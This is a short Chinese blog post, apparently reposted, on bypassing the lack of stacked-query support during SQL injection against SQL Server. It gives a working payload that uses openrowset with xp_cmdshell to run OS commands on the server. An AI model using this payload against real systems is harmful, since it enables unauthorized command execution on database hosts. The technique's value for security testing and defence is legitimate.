SQL注入不能多句执行时的一种突破方法(SA权限)
生活随笔
收集整理的這篇文章主要介紹了
SQL注入不能多句执行时的一种突破方法(SA权限)
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
?有時候會遇到SA權(quán)限不能多句執(zhí)行的情況,讓人很蛋疼。
前幾天在搞一個SQL SERVER 7.0的PUBLIC權(quán)限時。
某牛給我以下語句提權(quán)
本機測試成功。
但實際環(huán)境中卻出現(xiàn)[微軟] [ODBC SQL Server驅(qū)動] [SQL Server中] OLE DB提供程序'sqloledb'無法創(chuàng)建一個接口 的錯誤。原因不明,還望哪位大牛解釋。。
雖然這個問題偶還沒有解決,但今天遇到一個SA權(quán)限不能多句的情況(估計驅(qū)動問題,不解),讓我蛋疼了一段時間。
后來經(jīng)過GOOGLE,發(fā)現(xiàn)SA權(quán)限還可以這樣執(zhí)行 and 0<>(select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:'''))
這樣就繞過了多句執(zhí)行的限制了。
估計大牛們早就會了呃:)
轉(zhuǎn)載于:https://blog.51cto.com/pnig0s1992/487233
《新程序員》:云原生和全面數(shù)字化實踐50位技術(shù)專家共同創(chuàng)作,文字、視頻、音頻交互閱讀總結(jié)
以上是生活随笔為你收集整理的SQL注入不能多句执行时的一种突破方法(SA权限)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Java异常设计
- 下一篇: SugarCRM 主表-自定义字段